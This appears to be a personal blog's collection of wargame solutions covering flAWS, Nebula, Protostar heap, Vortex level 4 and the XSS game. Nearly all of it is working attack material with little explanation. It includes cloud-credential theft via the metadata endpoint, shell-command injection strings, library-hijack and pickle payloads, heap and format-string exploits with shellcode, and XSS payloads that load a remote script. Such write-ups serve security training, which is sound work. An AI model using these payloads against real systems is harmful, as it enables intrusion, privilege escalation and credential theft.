Showing posts with label wargame. Show all posts
Showing posts with label wargame. Show all posts

# flAWS challenge


Level 1: Directory (bucket) listing - Everyone

# # --no-sign-request: Do not sign requests. Credentials will not be loaded if this argument is provided.
# # --region (string): The region to use. Overrides config/env settings.
# aws --no-sign-request --region us-west-2 s3 ls s3://flaws.cloud/
# aws --no-sign-request --region us-west-2 s3 cp s3://flaws.cloud/secret-dd02c7c.html .
# cat secret-dd02c7c.html

Level 2: Directory (bucket) listing - Any authenticated AWS user

# aws --profile level2 configure
# aws s3 --profile level2 --region us-west-2 ls s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud
# aws s3 --profile level2 --region us-west-2 cp s3://level2-c8b217a33fcf1f839f6f1f73a00a9ae7.flaws.cloud/secret-e4443fc.html .
# cat secret-e4443fc.html

Level 3: AWS keys leaked

# aws s3 --no-sign-request --region us-west-2 ls s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud
# aws s3 --no-sign-request --region us-west-2 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/.git .git
# git log
# git checkout f7cebc46b471ca9838a0bdd1074bb498a3f84c87
# cat secret
# aws --profile level3 configure
# aws --profile level3 s3 ls

Level 4: Public snapshot as a backup

# aws --profile level3 --region us-west-2 sts get-caller-identity
# aws --profile level3 --region us-west-2 ec2 describe-snapshots --owner-id 975426262029
# aws --profile level2 --region us-west-2 ec2 create-volume --availability-zone us-west-2a --snapshot-id snap-0b49342abd1bdcb89
# aws --profile level2 ec2 describe-volumes --region=us-west-2
# aws --profile level2 --region us-west-2 ec2 create-security-group --group-name devenv-sg --description 'My security group'
# aws --profile level2 --region us-west-2 ec2 authorize-security-group-ingress --group-name devenv-sg --protocol tcp --port 22 --cidr 0.0.0.0/0
# aws --profile level2 --region us-west-2 ec2 create-key-pair --key-name devenv-key --query 'KeyMaterial' --output text > devenv-key.pem
# aws --profile level2 --region us-west-2 ec2 run-instances --image-id ami-29ebb519 --security-group-ids sg-xxxxxxxx --count 1 --instance-type t1.micro --key-name devenv-key --query 'Instances[0].InstanceId'
# ssh -i devenv-key.pem ubuntu@ip
# mount /dev/xvdb1 /mnt
# cat /mnt/home/ubuntu/setupNginx.sh

Level 5: Metadata at 169.254.169.254

# curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws
# echo "aws_session_token = xx" >> .aws/credentials
# aws --profile level5 s3 ls s3://level6-cc4c404a8a8b876167f5e70a7d8c9880.flaws.cloud

Level 6: SecurityAudit policy attached

# aws --profile level6 configure
# aws --profile level6 --region us-west-2 iam get-user
# aws --profile level6 --region us-west-2 iam list-attached-user-policies --user-name Level6
# aws --profile level6 --region us-west-2 iam get-policy --policy-arn arn:aws:iam::975426262029:policy/list_apigateways
# aws --profile level6 --region us-west-2 iam get-policy-version --policy-arn arn:aws:iam::975426262029:policy/list_apigateways --version-id v4
# aws --profile level6 --region us-west-2 lambda list-functions
# aws --profile level6 --region us-west-2 lambda get-policy --function-name Level6
# aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id 's33ppypa75'
# restapiid='s33ppypa75'
# region='us-west-2'
# stagename='Prod'
# functionname='level6'
# curl -k https://$restapiid.execute-api.$region.amazonaws.com/$stagename/$functionname

Reference

https://summitroute.com/blog/2017/02/26/flaws_challenge/
Posted by t0n1 0 comments
Labels: , , , ,

# Nebula


Level 00

$ find / -user flag00 -perm -4000 2>/dev/null
/bin/.../flag00
/rofs/bin/.../flag00
$ /bin/.../flag00
Congrats, now run getflag to get your flag!
$ /bin/getflag
You have successfully executed getflag on a target account

Level 01

$ ln -s /bin/getflag /tmp/echo
$ PATH=/tmp:$PATH
$ /home/flag01/flag01
You have successfully executed getflag on a target account

Level 02

$ USER=';/bin/getflag;#'
$ /home/flag02/flag02
about to call system("/bin/echo ;/bin/getflag;# is cool")

You have successfully executed getflag on a target account

Level 03

$ echo -en '#!/bin/sh\n\n/bin/getflag > /tmp/flag03' > /home/flag03/writable.d/l03.sh
$ cat /tmp/flag03
You have successfully executed getflag on a target account

Level 04

$ ln -s /home/flag04/token /tmp/t0k3n
$ /home/flag04/flag04 /tmp/t0k3n
06508b5e-8909-4f38-b630-fdb148a848a2
$ su -l flag04
Password: 06508b5e-8909-4f38-b630-fdb148a848a2
$ /bin/getflag
You have successfully executed getflag on a target account

Level 05

$ tar xvzf /home/flag05/.backup/backup-19072011.tgz -C /tmp/.
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys
$ ssh -i /tmp/.ssh/id_rsa flag05@localhost /bin/getflag
You have successfully executed getflag on a target account

Level 06

$ cat /etc/passwd | grep flag06
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh
$ echo 'flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh' > /tmp/flag06.pw
$ john /tmp/flag06.pw 
Loaded 1 password hash (Traditional DES [128/128 BS SSE2-16])
hello            (flag06)
$ su -l flag06
Password: hello
$ /bin/getflag
You have successfully executed getflag on a target account

Level 07

$ nc localhost 7007
GET /index.cgi?Host=localhost|/bin/getflag
Content-type: text/html

<html><head><title>Ping results</title></head><body><pre>
You have successfully executed getflag on a target account
</pre></body></html>

Level 08

$ wireshark capture.pcap
# Follow TCP Stream + Hexdump
000000D6  00 0d 0a 50 61 73 73 77 6f 72 64 3a 20 ...Password: 
000000B9  62 b
000000BA  61 a
000000BB  63 c
000000BC  6b k
000000BD  64 d
000000BE  6f o
000000BF  6f o
000000C0  72 r
000000C1  7f . <DEL>
000000C2  7f . <DEL>
000000C3  7f . <DEL>
000000C4  30 0
000000C5  30 0
000000C6  52 R
000000C7  6d m
000000C8  38 8
000000C9  7f . <DEL>
000000CA  61 a
000000CB  74 t
000000CC  65 e
000000CD  0d .
$ su -l flag08
Password: backd00Rmate
$ /bin/getflag 
You have successfully executed getflag on a target account

Level 09

$ echo '[email ${`/bin/echo;/usr/bin/id;/bin/getflag;/bin/echo`}]' > /tmp/l09
$ /home/flag09/flag09 /tmp/l09
PHP Notice:  Undefined offset: 2 in /home/flag09/flag09.php on line 22
PHP Notice:  Undefined variable: 
uid=1010(level09) gid=1010(level09) euid=990(flag09) groups=990(flag09),1010(level09)
You have successfully executed getflag on a target account

 in /home/flag09/flag09.php(15) : regexp code on line 1

Level 10

$ nc -v -k -l localhost 18211
$ for i in `seq 1 1000`; do ln -f -s /etc/hostname /tmp/token; /home/flag10/flag10 /tmp/token localhost & ln -f -s /home/flag10/token /tmp/token; done
$ nc -v -k -l localhost 18211
Connection from localhost port 18211 [tcp/*] accepted
.oO Oo.
615a2ce1-b2b5-4c76-8eed-8aa5c4015c27
$ su -l flag10
Password: 615a2ce1-b2b5-4c76-8eed-8aa5c4015c27
$ /bin/getflag
You have successfully executed getflag on a target account

Level 11

$ PATH=/tmp:$PATH
$ ln -s /bin/getflag /tmp/c
$ cat /tmp/11a.py 
#!/usr/bin/env python

CL = 'Content-Length: '
command = 'c'

payload = command
encrypted = ''

key = len(payload) & 0xff
for i in payload:
 encrypted += chr(ord(i) ^ key)
 key -= ord(i)
 key &= 0xff

print CL + str(len(encrypted))
print encrypted
$ chmod +x /tmp/11a.py
$ /tmp/11a.py | /home/flag11/flag11
You have successfully executed getflag on a target account
$ TEMP=/tmp
$ cat /tmp/11b.py 
#!/usr/bin/env python

CL = 'Content-Length: '
command = '/bin/getflag;'
comment = '#'
padding = 'A' * (1024 - len(command) - len(comment))

payload = command + comment + padding
encrypted = ''

key = len(payload) & 0xff
for i in payload:
 encrypted += chr(ord(i) ^ key)
 key -= ord(i)
 key &= 0xff

print CL + str(len(encrypted))
print encrypted
$ chmod +x /tmp/11b.py
$ /tmp/11b.py | /home/flag11/flag11 
blue = 1024, length = 1024, pink = 1024
You have successfully executed getflag on a target account

Level 12

$  nc localhost 50001 
Password:  4754a4f4bd5787accd33de887b9250a0691dd198; /bin/getflag > /tmp/flag12 # 
Congrats, your token is 413**CARRIER LOST**
$  cat /tmp/flag12 
You have successfully executed getflag on a target account

Level 13

$ cp /home/flag13/flag13 /tmp/.
$ echo 'int getuid() { return 1000; }' > /tmp/libfake.c
$ gcc -shared /tmp/libfake.c -o /tmp/libfake.so
$ LD_PRELOAD=/tmp/libfake.so /tmp/flag13
your token is b705702b-76a8-42b0-8844-3adabbe5ac58
$ su -l flag13
Password: b705702b-76a8-42b0-8844-3adabbe5ac58
$ /bin/getflag
You have successfully executed getflag on a target account

Level 14

$ /home/flag14/flag14 -e
123456
13579;
$ cat /home/flag14/token
857:g67?5ABBo:BtDA?tIvLDKL{MQPSRQWW.
$ cat /tmp/l14.py
#!/usr/bin/env python

import sys

token = sys.argv[1]

decrypted = ''
i = 0

for c in token:
 print '[' + c + '] -->',
 r = chr(ord(c) - i % 255)
 print r
 i += 1
 decrypted += r

print decrypted
$ /tmp/l14.py 857:g67?5ABBo:BtDA?tIvLDKL{MQPSRQWW.
[8] --> 8
[5] --> 4
[7] --> 5
[:] --> 7
[g] --> c
[6] --> 1
[7] --> 1
[?] --> 8
[5] --> -
[A] --> 8
[B] --> 8
[B] --> 7
[o] --> c
[:] --> -
[B] --> 4
[t] --> e
[D] --> 4
[A] --> 0
[?] --> -
[t] --> a
[I] --> 5
[v] --> a
[L] --> 6
[D] --> -
[K] --> 3
[L] --> 3
[{] --> a
[M] --> 2
[Q] --> 5
[P] --> 3
[S] --> 5
[R] --> 3
[Q] --> 1
[W] --> 6
[W] --> 5
[.] --> 

8457c118-887c-4e40-a5a6-33a25353165
$ su -l flag14
Password: 8457c118-887c-4e40-a5a6-33a25353165
$ /bin/getflag
You have successfully executed getflag on a target account

Level 15

$ strace /home/flag15/flag15
...
open("/var/tmp/flag15/libc.so.6", O_RDONLY) = -1 ENOENT (No such file or directory)
...
$ cat /tmp/libfake.c 
#define SHELL "/bin/sh"

int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end)) {
 system(SHELL);
 return 0;
}
$ cat /tmp/version 
GLIBC_2.0{};
$ gcc -fPIC -shared -static-libgcc -Wl,--version-script=/tmp/version,-Bstatic -o /var/tmp/flag15/libc.so.6 /tmp/libfake.c
$ /home/flag15/flag15
$ /bin/getflag
You have successfully executed getflag on a target account

Level 16

$ cat /tmp/L16
#!/bin/bash

/bin/getflag > /tmp/flag16
$ nc localhost 1616
GET /index.cgi?username=`/*/L16`
Content-type: text/html

<html><head><title>Login resuls</title></head><body>Your login failed<br/>Would you like a cookie?<br/><br/></body></html>
$ cat /tmp/flag16
You have successfully executed getflag on a target account

Level 17

$ cat /tmp/l17.py
import os
import pickle
import socket

class GetFlag(object):
 def __reduce__(self):
  return (os.system, ('/bin/getflag > /tmp/flag17', ))

payload = pickle.dumps(GetFlag())

host = 'localhost'
port = 10007

client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
client.connect((host, port))
client.send(payload)
client.close()
$ python /tmp/l17.py
$ cat /tmp/flag17
You have successfully executed getflag on a target account

Level 18

$ cat /tmp/Starting 
/usr/bin/id
/bin/getflag
$ chmod +x /tmp/Starting
$ PATH=/tmp:$PATH
$ python -c "print 'login me\n'*1021 + 'closelog\n'*1021 + 'shell\n'" | /home/flag18/flag18 --rcfile -d /tmp/debug -v -v -v 2> /dev/null
uid=981(flag18) gid=1019(level18) groups=981(flag18),1019(level18)
You have successfully executed getflag on a target account

Level 19

$ cat /tmp/fork.c
#include <unistd.h>

int main(){
 pid_t pid = fork();
 if(pid == 0){
  // Child
  char *path = "/home/flag19/flag19";
  char *cmd[] = {"/bin/sh", "-c", "/bin/echo && /usr/bin/id && /bin/getflag"};
  sleep(2);
  execv(path, cmd);
 }
 return 0;
}
$ gcc -o /tmp/fork /tmp/fork.c
$ /tmp/fork
$ 
uid=1020(level19) gid=1020(level19) euid=980(flag19) groups=980(flag19),1020(level19)
You have successfully executed getflag on a target account
$ cat /tmp/fork.py
import os
import time

def child():
 time.sleep(2)
 os.execv('/home/flag19/flag19', ['/bin/sh', '-c', '/bin/echo && /usr/bin/id && /bin/getflag'])

def parent():
 pid = os.fork()
 if pid == 0:
  child()

parent()
$ python /tmp/fork.py
$ 
uid=1020(level19) gid=1020(level19) euid=980(flag19) groups=980(flag19),1020(level19)
You have successfully executed getflag on a target account

Reference

https://exploit-exercises.com/nebula/
Posted by t0n1 0 comments
Labels: , ,

# Protostar - Heap


Heap 0

$ cat heap0.c
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

struct data {
  char name[64];
};

struct fp {
  int (*fp)();
};

void winner()
{
  printf("level passed\n");
}

void nowinner()
{
  printf("level has not been passed\n");
}

int main(int argc, char **argv)
{
  struct data *d;
  struct fp *f;

  d = malloc(sizeof(struct data));
  f = malloc(sizeof(struct fp));
  f->fp = nowinner;

  printf("data is at %p, fp is at %p\n", d, f);

  strcpy(d->name, argv[1]);
  
  f->fp();
}
$ file heap0
heap0: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
$ gdb heap0
(gdb) disassemble main
(gdb) p winner
$1 = {void (void)} 0x8048464 <winner>
(gdb) b *0x080484f2
(gdb) b *0x080484fd
(gdb) run AAAA
(gdb) x/20xw 0x804a008
0x804a008: 0x00000000 0x00000000 0x00000000 0x00000000
0x804a018: 0x00000000 0x00000000 0x00000000 0x00000000
0x804a028: 0x00000000 0x00000000 0x00000000 0x00000000
0x804a038: 0x00000000 0x00000000 0x00000000 0x00000000
0x804a048: 0x00000000 0x00000011 0x08048478 0x00000000
(gdb) c
(gdb) x/20xw 0x804a008
0x804a008: 0x41414141 0x00000000 0x00000000 0x00000000
0x804a018: 0x00000000 0x00000000 0x00000000 0x00000000
0x804a028: 0x00000000 0x00000000 0x00000000 0x00000000
0x804a038: 0x00000000 0x00000000 0x00000000 0x00000000
0x804a048: 0x00000000 0x00000011 0x08048478 0x00000000
(gdb) quit
$ ./heap0 `python -c 'from struct import pack; print "A"*(0x804a050-0x804a008) + pack("<I", 0x08048464)'`
data is at 0x804a008, fp is at 0x804a050
level passed

Heap 1

$ cat heap1.c
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

struct internet {
  int priority;
  char *name;
};

void winner()
{
  printf("and we have a winner @ %d\n", time(NULL));
}

int main(int argc, char **argv)
{
  struct internet *i1, *i2, *i3;

  i1 = malloc(sizeof(struct internet));
  i1->priority = 1;
  i1->name = malloc(8);

  i2 = malloc(sizeof(struct internet));
  i2->priority = 2;
  i2->name = malloc(8);

  strcpy(i1->name, argv[1]);
  strcpy(i2->name, argv[2]);

  printf("and that's a wrap folks!\n");
}
$ file heap1
heap1: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
$ gdb heap1
(gdb) disassemble main
(gdb) p winner
$1 = {void (void)} 0x8048494 <winner>
(gdb) x/i 0x80483cc
0x80483cc <puts@plt>: jmp    DWORD PTR ds:0x8049774
(gdb) x/xw 0x8049774
0x8049774 <_GLOBAL_OFFSET_TABLE_+36>: 0x080483d2
(gdb) b *0x080484ce
(gdb) b *0x080484e8
(gdb) b *0x080484fd
(gdb) b *0x08048517
(gdb) b *0x08048538
(gdb) b *0x08048555
(gdb) b *0x08048561
(gdb) run AAAA BBBB
(gdb) i r eax
eax            0x804a008  134520840
(gdb) c
(gdb) i r eax
eax            0x804a018  134520856
(gdb) c
(gdb) i r eax
eax            0x804a028  134520872
(gdb) c
(gdb) i r eax
eax            0x804a038  13452088
(gdb) c
(gdb) x/16xw 0x804a008
0x804a008:  0x00000001  0x0804a018  0x00000000  0x00000011
0x804a018:  0x00000000  0x00000000  0x00000000  0x00000011
0x804a028:  0x00000002  0x0804a038  0x00000000  0x00000011
0x804a038:  0x00000000  0x00000000  0x00000000  0x00020fc1
(gdb) quit
$ ./heap1 `python -c 'from struct import pack; print "A"*(0x804a02c-0x804a018) + pack("<I", 0x08049774), pack("<I", 0x08048494)'`
and we have a winner @ 1426618179

Heap 2

$ cat heap2.c
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

struct auth {
  char name[32];
  int auth;
};

struct auth *auth;
char *service;

int main(int argc, char **argv)
{
  char line[128];

  while(1) {
      printf("[ auth = %p, service = %p ]\n", auth, service);

      if(fgets(line, sizeof(line), stdin) == NULL) break;
      
      if(strncmp(line, "auth ", 5) == 0) {
          auth = malloc(sizeof(auth));
          memset(auth, 0, sizeof(auth));
          if(strlen(line + 5) < 31) {
              strcpy(auth->name, line + 5);
          }
      }
      if(strncmp(line, "reset", 5) == 0) {
          free(auth);
      }
      if(strncmp(line, "service", 6) == 0) {
          service = strdup(line + 7);
      }
      if(strncmp(line, "login", 5) == 0) {
          if(auth->auth) {
              printf("you have logged in already!\n");
          } else {
              printf("please enter your password\n");
          }
      }
  }
}
$ file heap2  
heap2: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
$ gdb heap2
(gdb) disassemble main
(gdb) b *0x08048942
(gdb) run
[ auth = (nil), service = (nil) ]
auth AAAA
(gdb) info proc map
process 1682
cmdline = '/opt/protostar/bin/heap2'
cwd = '/opt/protostar/bin'
exe = '/opt/protostar/bin/heap2'
Mapped address spaces:

  Start Addr   End Addr       Size     Offset objfile
   0x8048000  0x804b000     0x3000          0        /opt/protostar/bin/heap2
   0x804b000  0x804c000     0x1000     0x3000        /opt/protostar/bin/heap2
   0x804c000  0x804d000     0x1000          0           [heap]
  0xb7e96000 0xb7e97000     0x1000          0        
  0xb7e97000 0xb7fd5000   0x13e000          0         /lib/libc-2.11.2.so
  0xb7fd5000 0xb7fd6000     0x1000   0x13e000         /lib/libc-2.11.2.so
  0xb7fd6000 0xb7fd8000     0x2000   0x13e000         /lib/libc-2.11.2.so
  0xb7fd8000 0xb7fd9000     0x1000   0x140000         /lib/libc-2.11.2.so
  0xb7fd9000 0xb7fdc000     0x3000          0        
  0xb7fde000 0xb7fe2000     0x4000          0        
  0xb7fe2000 0xb7fe3000     0x1000          0           [vdso]
  0xb7fe3000 0xb7ffe000    0x1b000          0         /lib/ld-2.11.2.so
  0xb7ffe000 0xb7fff000     0x1000    0x1a000         /lib/ld-2.11.2.so
  0xb7fff000 0xb8000000     0x1000    0x1b000         /lib/ld-2.11.2.so
  0xbffeb000 0xc0000000    0x15000          0           [stack]
(gdb) x/12xw 0x804c000
0x804c000:  0x00000000  0x00000011  0x41414141  0x0000000a
0x804c010:  0x00000000  0x00000ff1  0x00000000  0x00000000
0x804c020:  0x00000000  0x00000000  0x00000000  0x00000000
(gdb) p &auth->name
$1 = (char (*)[32]) 0x804c008
(gdb) p &auth->auth
$2 = (int *) 0x804c028
(gdb) c
[ auth = 0x804c008, service = (nil) ]
serviceAAAABBBBCCCCDDDD
(gdb) x/12xw 0x804c000
0x804c000:  0x00000000  0x00000011  0x41414141  0x0000000a
0x804c010:  0x00000000  0x00000019  0x41414141  0x42424242
0x804c020:  0x43434343  0x44444444  0x0000000a  0x00000fd9
(gdb) x/xw &auth->auth
0x804c028:  0x0000000a
(gdb) c
[ auth = 0x804c008, service = 0x804c018 ]
login
you have logged in already!

Heap 3

$ cat heap3.c
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

void winner()
{
  printf("that wasn't too bad now, was it? @ %d\n", time(NULL));
}

int main(int argc, char **argv)
{
  char *a, *b, *c;

  a = malloc(32);
  b = malloc(32);
  c = malloc(32);

  strcpy(a, argv[1]);
  strcpy(b, argv[2]);
  strcpy(c, argv[3]);

  free(c);
  free(b);
  free(a);

  printf("dynamite failed?\n");
}
$ file heap3
heap3: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped
$ gdb heap3
(gdb) disassemble main
(gdb) b *0x080488c5
(gdb) p winner
$1 = {void (void)} 0x8048864 
(gdb) run A B C
(gdb) info proc map
process 1784
cmdline = '/opt/protostar/bin/heap3'
cwd = '/opt/protostar/bin'
exe = '/opt/protostar/bin/heap3'
Mapped address spaces:

  Start Addr   End Addr       Size     Offset objfile
   0x8048000  0x804b000     0x3000          0        /opt/protostar/bin/heap3
   0x804b000  0x804c000     0x1000     0x3000        /opt/protostar/bin/heap3
   0x804c000  0x804d000     0x1000          0           [heap]
  0xb7e96000 0xb7e97000     0x1000          0        
  0xb7e97000 0xb7fd5000   0x13e000          0         /lib/libc-2.11.2.so
  0xb7fd5000 0xb7fd6000     0x1000   0x13e000         /lib/libc-2.11.2.so
  0xb7fd6000 0xb7fd8000     0x2000   0x13e000         /lib/libc-2.11.2.so
  0xb7fd8000 0xb7fd9000     0x1000   0x140000         /lib/libc-2.11.2.so
  0xb7fd9000 0xb7fdc000     0x3000          0        
  0xb7fe0000 0xb7fe2000     0x2000          0        
  0xb7fe2000 0xb7fe3000     0x1000          0           [vdso]
  0xb7fe3000 0xb7ffe000    0x1b000          0         /lib/ld-2.11.2.so
  0xb7ffe000 0xb7fff000     0x1000    0x1a000         /lib/ld-2.11.2.so
  0xb7fff000 0xb8000000     0x1000    0x1b000         /lib/ld-2.11.2.so
  0xbffeb000 0xc0000000    0x15000          0           [stack]
(gdb) x/i 0x8048790
0x8048790 <puts@plt>: jmp    DWORD PTR ds:0x804b128
(gdb) x/xw 0x804b128
0x804b128 <_GLOBAL_OFFSET_TABLE_+64>: 0x08048796
(gdb) x/32xw 0x804c000
0x804c000:  0x00000000  0x00000029  0x00000000  0x00000000 shellcode = [push @winner; ret]
0x804c010:  0x00000000  0x00000000  0x00000000  0x00000000
0x804c020:  0x00000000  0x00000000  0x00000000  0x00000029 [-4] [-4]
0x804c030:  0x00000000  0x00000000  0x00000000  0x00000000 [BBBB] [@got_puts - 12] [@shellcode]
0x804c040:  0x00000000  0x00000000  0x00000000  0x00000000
0x804c050:  0x00000000  0x00000029  0x00000000  0x00000000
0x804c060:  0x00000000  0x00000000  0x00000000  0x00000000
0x804c070:  0x00000000  0x00000000  0x00000000  0x00000f89
(gdb) quit
$ ./heap3 `python -c 'from struct import pack; print "A"*4 + "\x68\x64\x88\x04\x08\xc3" + "A"*22 + pack("<I", 0xfffffffc)*2, "B"*4 + pack("<I", 0x0804b128-12) + pack("<I", 0x804c00c), "C"'`
that wasn't too bad now, was it? @ 1426954122

Reference

https://exploit-exercises.com/protostar/
Posted by t0n1 0 comments
Labels: , , , ,

# Vortex wargame: Level 4 


# ssh [email protected]
[email protected]'s password:32596d674b313d6a77

$ file /vortex/vortex4
/vortex/vortex4: setuid ELF 32-bit LSB  executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, BuildID[sha1]=11041f50a7845267e6d05f6f11dd37de0a33d423, not stripped

$ mkdir /tmp/v4
$ cd /tmp/v4
$ cat execve.c 
#include <unistd.h>

int main(int argc, char **argv){
 char *env[4];
 env[0]="";
 env[1]="EGG=\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
 env[2]=argv[2];
 env[3]=NULL;
 execve(argv[1], NULL, env);
}
$ gcc -m32 -o execve execve.c
$ cat getenvaddr.c
#include <stdio.h>

int main(int argc,char *argv[]){
        char *ptr;
        ptr = getenv("EGG");
 ptr += 3;
        printf("%s will be at %p\n", "EGG", ptr);
        return 0;
}
$ gcc -m32 -o getenvaddr getenvaddr.c
$ cat format_string.py
#!/usr/bin/python

import sys
import struct

def whatprinted(what, printed):
 while what <= printed:
  what += 0x100
 what -= printed
 return what, what + printed

def fs_4writes(what, where, printed, init):
 mask     = 0xff
 printed  = 16 + printed # (4 bytes * 4 where_addresses) + printed
 what_b0  = (what      ) & mask
 what_b1  = (what >>  8) & mask
 what_b2  = (what >> 16) & mask
 what_b3  = (what >> 24) & mask

 what_b0, printed = whatprinted(what_b0, printed)
 what_b1, printed = whatprinted(what_b1, printed)
 what_b2, printed = whatprinted(what_b2, printed)
 what_b3, printed = whatprinted(what_b3, printed)

 return  struct.pack('<I',  where     ) + \
  struct.pack('<I', (where + 1)) + \
  struct.pack('<I', (where + 2)) + \
  struct.pack('<I', (where + 3)) + \
  ('%%%dc'    % what_b0  ) + \
  ('%%%d$hhn' % init     ) + \
  ('%%%dc'    % what_b1  ) + \
  ('%%%d$hhn' % (init + 1)     ) + \
  ('%%%dc'    % what_b2  ) + \
  ('%%%d$hhn' % (init + 2)     ) + \
  ('%%%dc'    % what_b3  ) + \
  ('%%%d$hhn' % (init + 3)     )

if len(sys.argv) == 7:

 mode    = sys.argv[1]
 what    = int(sys.argv[2], 16)
 where   = int(sys.argv[3], 16)
 printed = int(sys.argv[4])
 init    = int(sys.argv[5])
 align   = int(sys.argv[6])

 fs = fs_4writes(what, where, printed, init)
 align = '#' * align

 if mode == 'findinit':
  pop =   '%' + str(init) + '$x'
  pop += '-' * (len(fs) - len(pop))
  payload = pop + align
 elif mode == 'exploit':
  payload = fs  + align

 print payload
else:
 print sys.argv[0], '<mode> <what> <where> <printed> <init> <padding>'
$ gdb /vortex/vortex4
(gdb) set disassembly-flavor intel
(gdb) disassemble main
   0x0804844d <+0>: push   ebp
   0x0804844e <+1>: mov    ebp,esp
   0x08048450 <+3>: and    esp,0xfffffff0
   0x08048453 <+6>: sub    esp,0x10
   0x08048456 <+9>: cmp    DWORD PTR [ebp+0x8],0x0 argc =? 0
   0x0804845a <+13>: je     0x8048468 <main+27>
   0x0804845c <+15>: mov    DWORD PTR [esp],0x0
   0x08048463 <+22>: call   0x8048330 <exit@plt>
   0x08048468 <+27>: mov    eax,DWORD PTR [ebp+0xc]
   0x0804846b <+30>: add    eax,0xc
   0x0804846e <+33>: mov    eax,DWORD PTR [eax]
   0x08048470 <+35>: mov    DWORD PTR [esp],eax
   0x08048473 <+38>: call   0x8048310 <printf@plt>
   0x08048478 <+43>: mov    DWORD PTR [esp],0x0
   0x0804847f <+50>: call   0x8048330 <exit@plt>
$ readelf -r /vortex/vortex4

Relocation section '.rel.dyn' at offset 0x2ac contains 1 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
08049ffc  00000206 R_386_GLOB_DAT    00000000   __gmon_start__

Relocation section '.rel.plt' at offset 0x2b4 contains 4 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
0804a00c  00000107 R_386_JUMP_SLOT   00000000   printf
0804a010  00000207 R_386_JUMP_SLOT   00000000   __gmon_start__
0804a014  00000307 R_386_JUMP_SLOT   00000000   exit
0804a018  00000407 R_386_JUMP_SLOT   00000000   __libc_start_main

$ ./execve /tmp/v4/getenvaddr `./format_string.py findinit 0xffffffff 0804a014 0 104 5`
EGG will be at 0xffffdf83
$ ./execve /tmp/v4/getenvaddr `./format_string.py findinit 0xffffdf83 0804a014 0 104 5`
EGG will be at 0xffffdf85
$ ./execve /vortex/vortex4 `./format_string.py findinit 0xffffdf85 0804a014 0 104 5`; echo
34303125------------------------------------------------------------##### %104 = init
$ ./execve /vortex/vortex4 `./format_string.py exploit 0xffffdf85 0804a014 0 104 5`; echo
$ whoami
vortex5
$ /bin/cat /etc/vortex_pass/vortex5
3a3456746243346c72
Posted by t0n1 0 comments
Labels: , , , ,

# XSS game area


Level 1: Hello, world of XSS

https://xss-game.appspot.com/level1/frame
query=<script>alert('xss')</script>

Level 2: Persistence is key

https://xss-game.appspot.com/level2/frame
post-content=<img src='foo' onerror='alert("xss")'>
post-content=<img src='foo' onerror='alert(document.cookie)'>
post-content=<img src='foo' onerror='s=document.createElement("script");s.src="//192.168.1.200/xss.js";document.body.appendChild(s)'>

Level 3: That sinking feeling...

https://xss-game.appspot.com/level3/frame#1
URL=https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'>

Level 4: Context matters

https://xss-game.appspot.com/level4/frame
timer=');alert('xss

Level 5: Breaking protocol

https://xss-game.appspot.com/level5/frame
URL=https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('xss')

Level 6: Follow the X

https://xss-game.appspot.com/level6/frame#/static/gadget.js
URL=https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')
URL=https://xss-game.appspot.com/level6/frame#Https://192.168.1.1/xss.js
URL=https://xss-game.appspot.com/level6/frame#//192.168.1.1/xss.js

Tools

# ratproxy -w proxy.log -v traces_dir -p 8080 -d xss-game.appspot.com -lextifscgjm
# ratproxy -w proxy.log -v traces_dir -p 8080 -d xss-game.appspot.com -XC

# skipfish -b i -I xss-game.appspot.com -X /css/,/img/ -Z -o report_dir -M -E -U https://xss-game.appspot.com

References

http://tools.ietf.org/html/draft-hoehrmann-javascript-scheme-00
